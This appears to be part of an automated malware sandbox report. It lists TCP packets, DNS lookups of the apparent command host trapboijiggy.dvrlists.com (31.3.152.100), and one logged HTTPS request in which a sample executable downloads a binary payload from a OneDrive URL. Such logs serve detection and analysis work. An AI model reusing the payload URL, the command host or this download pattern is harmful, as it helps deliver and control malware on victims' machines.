                                        Sep 22, 2021 21:00:00.146126032 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.146169901 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.146200895 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.147568941 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.147593975 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.147644997 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.147994995 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.148055077 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.148721933 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.148964882 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.148987055 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149009943 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149024010 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.149035931 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149060011 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149060965 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.149080992 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149102926 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149115086 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.149141073 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149143934 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.149552107 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149576902 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149599075 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149602890 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.149620056 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149650097 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.149719000 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149743080 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149763107 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.149765968 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149790049 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149806976 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.149827957 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.149873018 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.150096893 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.150157928 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.150182962 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.150204897 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.150206089 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.150228977 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.150254011 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.150358915 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.150408983 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.150423050 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.150446892 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.150504112 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.150509119 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.150532961 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.150584936 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.151163101 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151186943 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151205063 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151230097 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151252985 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151264906 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.151276112 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151295900 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.151299000 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151320934 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151339054 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.151343107 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151365042 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.151437044 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151459932 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.151487112 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.153320074 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.153356075 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.153378010 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.153392076 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.153403997 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.153426886 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.153426886 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.153449059 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.153470993 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.153477907 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.153491974 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.153507948 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.153511047 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.153561115 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.227581024 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:07.299068928 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:07.417542934 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:07.469746113 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:07.470323086 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:07.521616936 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:07.566442966 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:07.572442055 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:08.791080952 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:09.186621904 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:09.386050940 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:17.537565947 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:17.545322895 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:17.755474091 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:27.552700996 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:27.560283899 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:27.774357080 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:31.852688074 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:32.050832987 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:32.166727066 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:32.166918993 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:37.571424961 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:37.735954046 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:37.886415958 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:37.886605978 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:39.127422094 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:43.069118023 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.069164991 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.069283009 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.070439100 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.070468903 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.474332094 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.474505901 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.475852013 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.478780031 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.487909079 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.487935066 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.488360882 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.488437891 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.489640951 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.531133890 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.890031099 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.890059948 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.890081882 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.890212059 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.890227079 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.890239000 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.890448093 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.891671896 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.891849041 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.891877890 CEST4434981740.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:43.892066002 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:43.892083883 CEST49817443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:45.585024118 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:45.585068941 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:45.585159063 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:45.585890055 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:45.585907936 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:45.979742050 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:45.980242014 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:45.981198072 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:45.981219053 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:45.988666058 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:45.988816977 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:49.091959953 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:49.092017889 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:49.092130899 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:49.093420029 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:49.093442917 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:49.489770889 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:49.489995956 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:49.490660906 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:49.490744114 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:49.890657902 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:49.890707970 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:49.891283989 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:49.891369104 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:49.892107010 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:49.939143896 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:50.273729086 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:50.273782969 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:50.273808002 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:50.274010897 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:50.274044037 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:50.274111032 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:50.281862020 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:50.282140017 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:50.282177925 CEST4434982240.79.207.80192.168.2.4
                                        Sep 22, 2021 21:00:50.282267094 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:50.282289028 CEST49822443192.168.2.440.79.207.80
                                        Sep 22, 2021 21:00:53.510781050 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:53.510823011 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:53.510848045 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:53.511018038 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:53.511065960 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:53.511090040 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:53.511152029 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:53.514008045 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:53.514287949 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:53.514334917 CEST4434982040.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:53.515808105 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:53.515830994 CEST49820443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:54.269917011 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:54.269954920 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:54.270078897 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:54.270522118 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:54.270534992 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:54.686036110 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:54.686244011 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:54.687093973 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:54.687105894 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:54.691407919 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:54.691430092 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.167870045 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.167907000 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.167933941 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.167989969 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.168039083 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.168052912 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.168104887 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.303061962 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.303088903 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.303170919 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.303273916 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.303293943 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.303316116 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.303364038 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.303376913 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.438484907 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.438530922 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.438656092 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.438760042 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.438786983 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.438806057 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.438863993 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.438894987 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.438977957 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.438987970 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.439066887 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.439158916 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.439245939 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.439255953 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.439331055 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.575010061 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.575054884 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.575300932 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.575325012 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.575377941 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.579210997 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.579834938 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.580080032 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.580185890 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.580459118 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.581758976 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.581785917 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.582037926 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.582134962 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.582181931 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.582217932 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.582226038 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.582254887 CEST49825443192.168.2.440.79.207.82
                                        Sep 22, 2021 21:00:55.582268000 CEST4434982540.79.207.82192.168.2.4
                                        Sep 22, 2021 21:00:55.582293034 CEST49825443192.168.2.440.79.207.82

                                        UDP Packets


                                        DNS Queries

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Sep 22, 2021 20:59:39.162967920 CEST | 192.168.2.4 | 8.8.8.8 | 0x3125 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 20:59:40.230003119 CEST | 192.168.2.4 | 8.8.8.8 | 0x219e | Standard query (0) | qclcfg.sn.files.1drv.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 20:59:55.956077099 CEST | 192.168.2.4 | 8.8.8.8 | 0x988 | Standard query (0) | trapboijiggy.dvrlists.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:00:42.121140957 CEST | 192.168.2.4 | 8.8.8.8 | 0x25bc | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:00:43.023890018 CEST | 192.168.2.4 | 8.8.8.8 | 0xa3ce | Standard query (0) | qclcfg.sn.files.1drv.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:00:47.827071905 CEST | 192.168.2.4 | 8.8.8.8 | 0x7f6f | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:00:49.001669884 CEST | 192.168.2.4 | 8.8.8.8 | 0x5658 | Standard query (0) | qclcfg.sn.files.1drv.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:01:15.866420031 CEST | 192.168.2.4 | 8.8.8.8 | 0xd7f3 | Standard query (0) | trapboijiggy.dvrlists.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:01:17.335635900 CEST | 192.168.2.4 | 8.8.8.8 | 0x617f | Standard query (0) | trapboijiggy.dvrlists.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:01:21.800792933 CEST | 192.168.2.4 | 8.8.8.8 | 0xbd38 | Standard query (0) | trapboijiggy.dvrlists.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:01:23.260507107 CEST | 192.168.2.4 | 8.8.8.8 | 0xc3fe | Standard query (0) | trapboijiggy.dvrlists.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:01:24.709548950 CEST | 192.168.2.4 | 8.8.8.8 | 0xe733 | Standard query (0) | trapboijiggy.dvrlists.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:01:26.181372881 CEST | 192.168.2.4 | 8.8.8.8 | 0xe58 | Standard query (0) | trapboijiggy.dvrlists.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:01:27.631864071 CEST | 192.168.2.4 | 8.8.8.8 | 0x38b9 | Standard query (0) | trapboijiggy.dvrlists.com | A (IP address) | IN (0x0001) |
| Sep 22, 2021 21:01:30.023662090 CEST | 192.168.2.4 | 8.8.8.8 | 0xdf46 | Standard query (0) | trapboijiggy.dvrlists.com | A (IP address) | IN (0x0001) |

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Sep 22, 2021 20:59:39.196510077 CEST | 8.8.8.8 | 192.168.2.4 | 0x3125 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                        Sep 22, 2021 20:59:40.278013945 CEST | 8.8.8.8 | 192.168.2.4 | 0x219e | No error (0) | qclcfg.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                                        Sep 22, 2021 20:59:40.278013945 CEST | 8.8.8.8 | 192.168.2.4 | 0x219e | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                        Sep 22, 2021 20:59:40.278013945 CEST | 8.8.8.8 | 192.168.2.4 | 0x219e | No error (0) | sn-files.ha.1drv.com | | 40.79.207.82 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 20:59:56.089998007 CEST | 8.8.8.8 | 192.168.2.4 | 0x988 | No error (0) | trapboijiggy.dvrlists.com | | 31.3.152.100 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 21:00:42.146001101 CEST | 8.8.8.8 | 192.168.2.4 | 0x25bc | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                        Sep 22, 2021 21:00:43.065958023 CEST | 8.8.8.8 | 192.168.2.4 | 0xa3ce | No error (0) | qclcfg.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                                        Sep 22, 2021 21:00:43.065958023 CEST | 8.8.8.8 | 192.168.2.4 | 0xa3ce | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                        Sep 22, 2021 21:00:43.065958023 CEST | 8.8.8.8 | 192.168.2.4 | 0xa3ce | No error (0) | sn-files.ha.1drv.com | | 40.79.207.82 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 21:00:47.885828972 CEST | 8.8.8.8 | 192.168.2.4 | 0x7f6f | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                        Sep 22, 2021 21:00:49.082707882 CEST | 8.8.8.8 | 192.168.2.4 | 0x5658 | No error (0) | qclcfg.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
                                        Sep 22, 2021 21:00:49.082707882 CEST | 8.8.8.8 | 192.168.2.4 | 0x5658 | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                        Sep 22, 2021 21:00:49.082707882 CEST | 8.8.8.8 | 192.168.2.4 | 0x5658 | No error (0) | sn-files.ha.1drv.com | | 40.79.207.80 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 21:01:15.996768951 CEST | 8.8.8.8 | 192.168.2.4 | 0xd7f3 | No error (0) | trapboijiggy.dvrlists.com | | 31.3.152.100 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 21:01:17.466048956 CEST | 8.8.8.8 | 192.168.2.4 | 0x617f | No error (0) | trapboijiggy.dvrlists.com | | 31.3.152.100 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 21:01:21.931515932 CEST | 8.8.8.8 | 192.168.2.4 | 0xbd38 | No error (0) | trapboijiggy.dvrlists.com | | 31.3.152.100 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 21:01:23.391366959 CEST | 8.8.8.8 | 192.168.2.4 | 0xc3fe | No error (0) | trapboijiggy.dvrlists.com | | 31.3.152.100 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 21:01:24.841232061 CEST | 8.8.8.8 | 192.168.2.4 | 0xe733 | No error (0) | trapboijiggy.dvrlists.com | | 31.3.152.100 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 21:01:26.315176010 CEST | 8.8.8.8 | 192.168.2.4 | 0xe58 | No error (0) | trapboijiggy.dvrlists.com | | 31.3.152.100 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 21:01:27.769275904 CEST | 8.8.8.8 | 192.168.2.4 | 0x38b9 | No error (0) | trapboijiggy.dvrlists.com | | 31.3.152.100 | A (IP address) | IN (0x0001)
                                        Sep 22, 2021 21:01:30.153722048 CEST | 8.8.8.8 | 192.168.2.4 | 0xdf46 | No error (0) | trapboijiggy.dvrlists.com | | 31.3.152.100 | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • qclcfg.sn.files.1drv.com

                                        HTTPS Proxied Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.4 | 49752 | 40.79.207.82 | 443 | C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2021-09-22 18:59:40 UTC | 0 | OUT | GET /y4mtCv4Bci6Hac_003x4VqzvkaJ-Z7nxrwXcb5jXVlYKlkhzWcxF7Vo37EbW_a-xuXuD_W5Kw2en7grAo9VbJ93WjIPSIXnkhhC01YboquwGm2AIlaKoBHi_6VZm402f9HRyjx263a6hGcO_detpGkOuS1Iilkybf-0BKA08CLK0ztz37lt8lonO0Gj45brJhwsjCvER4HfRxI_WR-8c3FzLA/Bkmhwqlbkulnphubkhqeoycsyqhknoi?download&psid=1 HTTP/1.1
                                        User-Agent: zipo
                                        Host: qclcfg.sn.files.1drv.com
                                        Connection: Keep-Alive
                                        2021-09-22 18:59:41 UTC | 0 | IN | HTTP/1.1 200 OK
                                        Cache-Control: public
                                        Content-Length: 844288
                                        Content-Type: application/octet-stream
